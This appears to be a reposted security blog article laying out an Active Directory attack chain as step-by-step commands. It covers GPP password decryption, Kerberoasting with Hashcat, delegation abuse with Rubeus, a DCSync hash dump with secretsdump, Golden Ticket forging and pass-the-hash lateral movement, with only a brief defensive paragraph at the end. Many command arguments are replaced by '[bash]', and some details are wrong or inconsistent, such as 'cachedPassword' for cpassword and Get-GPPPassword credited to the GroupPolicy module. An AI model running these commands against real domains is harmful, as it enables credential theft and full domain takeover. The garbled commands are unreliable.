Listen to this Post
Introduction:
Active Directory (AD) is the backbone of identity and access management for over 90% of enterprises worldwide, making it the single most critical—and vulnerable—attack surface in modern network security. While it provides seamless authentication and centralized control, misconfigurations and inherent protocol weaknesses transform it into a goldmine for adversaries. This article dissects the anatomy of an AD attack chain, moving from initial reconnaissance to full domain compromise. By simulating both offensive techniques and defensive mitigations, we provide a technical roadmap for red teamers and a hardening guide for blue teams.
Learning Objectives:
- Understand how to perform stealthy internal reconnaissance to map AD trusts and privileges.
- Execute common Kerberos-based attacks (Kerberoasting, AS-REP Roasting) to crack service account hashes.
- Leverage SYSVOL and Group Policy Preferences (GPP) for privilege escalation.
- Utilize DCSync attacks to extract password hashes and achieve persistence.
- Implement defensive commands and configurations to detect and mitigate these specific attack vectors.
You Should Know:
1. Initial Reconnaissance: Enumerating the Domain Without Logs
Before executing any exploit, an attacker must understand the landscape. Using minimal, non-intrusive tools is key to avoiding detection by Endpoint Detection and Response (EDR) solutions.
What it does: We will use native Windows tools and a lightweight PowerShell script to map domain admins, OU structure, and computers without writing malicious binaries to disk.
Step‑by‑step guide:
1. Identify the current user and domain context:
whoami echo %USERDOMAIN% net config workstation
2. Query Domain Controllers:
nltest /dclist:[bash]
3. Enumerate all users in the domain (using PowerShell to avoid `net user` triggers):
Get-ADUser -Filter -Properties SamAccountName,Description,LastLogonDate | Select SamAccountName,Description
4. Check for “AdminCount” – users with privileged access:
Get-ADUser -Filter {AdminCount -eq 1} -Properties AdminCount,MemberOf
5. Map out all Domain Admins:
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Note: On Linux, tools like `ldapsearch` or `bloodhound-python` can ingest this data for visualization in BloodHound.
2. Harvesting Credentials from SYSVOL and GPP
A common misconfiguration in older or poorly maintained domains is the storage of encrypted passwords in Group Policy Preferences (GPP). While Microsoft released a patch in 2014 (KB2962486) to prevent new credentials from being stored, existing ones often remain.
What it does: It locates the `Groups.xml` file in the SYSVOL share, which contains a password encrypted with a static, publicly known AES key.
Step‑by‑step guide:
- Navigate to the SYSVOL share on a Domain Controller (if compromised) or accessible client:
dir \[bash]\SYSVOL[bash]\Policies
2. Search recursively for `Groups.xml`:
dir \[bash]\SYSVOL[bash]\Policies\ /s groups.xml
3. Open the file and locate the `cpassword` attribute:
<Properties ... cachedPassword="AzV2Mx...==" .../>
4. Decrypt the password using a built-in PowerShell module (or online tools) on your attack machine:
Load the GroupPolicy module
Import-Module GroupPolicy
Decrypt the cpassword
Get-GPPPassword -Path "\[bash]\SYSVOL[bash]\Policies{GUID}\Machine\Preferences\Groups\Groups.xml"
Alternatively, use a Python script:
On Kali Linux gpp-decrypt "AzV2Mx...=="
3. Kerberoasting: Attacking Service Accounts
Kerberoasting is a post-exploitation technique that requests service tickets for accounts running services (like MSSQL or IIS) and cracks them offline. These accounts often run with elevated privileges.
What it does: A user with a valid domain account requests a Ticket Granting Service (TGS) ticket for a Service Principal Name (SPN). The ticket is encrypted with the service account’s NTLM hash, which can be extracted and brute-forced offline.
Step‑by‑step guide (Windows):
1. Identify all SPNs in the domain:
setspn -T [bash] -Q /
2. Use `Add-Type` to call Kerberos functions and request tickets (using Rubeus or native `Get-DomainUser` from PowerView):
Using PowerView (import first) Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
This exports the tickets in a format ready for cracking.
Step‑by‑step guide (Linux):
1. Use Impacket’s `GetUserSPNs.py` to request TGS tickets:
Syntax: GetUserSPNs.py [bash]/[bash]:[bash] -dc-ip [bash] -request GetUserSPNs.py corp.local/john.doe:Password123! -dc-ip 10.10.10.1 -request
2. Save the output to a file (e.g., hash.txt).
3. Crack the hash with Hashcat:
Kerberos 5 TGS-REP etype 23 is mode 13100 hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
4. Exploiting Unconstrained and Constrained Delegation
Delegation allows a service to impersonate a user to access another service. If misconfigured, it leads to full domain compromise.
What it does: We check for computers/servers marked as “Trusted for Delegation”. If we compromise a server with unconstrained delegation, we can force a Domain Controller to authenticate to it, capturing the Domain Controller’s Ticket Granting Ticket (TGT) in memory.
Step‑by‑step guide:
1. Find delegation configurations:
Find computers with unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
Find users with constrained delegation
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne $null} -Properties msDS-AllowedToDelegateTo
2. If you have admin access on a server with unconstrained delegation, use Rubeus to monitor for TGTs:
Rubeus.exe monitor /interval:1 /targetuser:DC01$
Then, use the `PrintBug` or `SpoolSample` exploit to force the Domain Controller to connect to your compromised server, capturing its TGT.
5. DCSync: The Ultimate Domain Persistence
The DCSync attack simulates the behavior of a Domain Controller and requests replication of password hashes from a legitimate DC. This requires high privileges (like Domain Admins or specific Replication-Get-Changes-All rights) but provides persistent access.
What it does: It uses the Directory Replication Service (DRS) Remote Protocol to replicate user credentials (hashes) without logging into the Domain Controller itself.
Step‑by‑step guide (using Impacket on Linux):
- From a compromised machine with Domain Admin credentials, run:
Dump all domain hashes secretsdump.py [bash]/[bash]@[bash] -just-dc To target a specific user secretsdump.py [bash]/[bash]@[bash] -just-dc-user krbtgt
- Use the extracted `krbtgt` hash to create a Golden Ticket, granting access to any resource in the domain.
Using Impacket ticketer ticketer.py -nthash [bash] -domain-sid [bash] -domain [bash] Administrator export KRB5CCNAME=Administrator.ccache psexec.py [bash]/Administrator@[bash] -k -no-pass
6. Lateral Movement: Pass-the-Hash and WMI
Once you have a hash (NTLM), you don’t always need the plaintext password. Pass-the-Hash (PtH) allows you to authenticate to other machines.
What it does: It leverages the NTLM authentication mechanism by using the hash directly to establish a connection.
Step‑by‑step guide:
- On Windows, use Mimikatz or Invoke-TheHash to execute commands:
Using Invoke-TheHash (PowerShell) Invoke-SMBExec -Target 10.10.10.50 -Domain corp.local -Username Administrator -Hash [bash] -Command "whoami"
- On Linux, use Impacket’s
psexec.py,wmiexec.py, orsmbexec.py:Execute a command via WMI wmiexec.py -hashes :[bash] [bash]/[email protected]
Once inside, establish persistence by creating a local admin or dumping LSASS memory.
What Undercode Say:
- Assume Breach, Protect Privilege: The attack chain demonstrates that once a standard workstation is compromised, the path to Domain Admin is often paved by legacy configurations (GPP), weak service account passwords (Kerberoasting), and inherent protocol trusts (Delegation). Segmentation and tiering are not optional; they are mandatory to stop lateral movement.
- Visibility is Your Shield: The most effective defense against the techniques above is auditing and monitoring. Enabling advanced audit policies for Kerberos service ticket operations (Event ID 4769), replication attempts (Event ID 4662), and changes to privileged groups provides the necessary telemetry to detect these attacks in progress, often before they succeed.
Prediction:
As on-premises Active Directory environments increasingly hybridize with Azure AD, the attack surface is shifting from the traditional `NTLM` and `Kerberos` protocols to include OAuth and SAML token manipulation. We predict a rise in “Cloud Kerberoasting,” where attackers target service principals in Entra ID (Azure AD) with high API permissions. The next wave of domain dominance will involve federated identity compromises, requiring defenders to master cloud-native identity protection tools like Conditional Access and Identity Protection, moving beyond the traditional perimeter of the Domain Controller.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Sinan Daglar – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
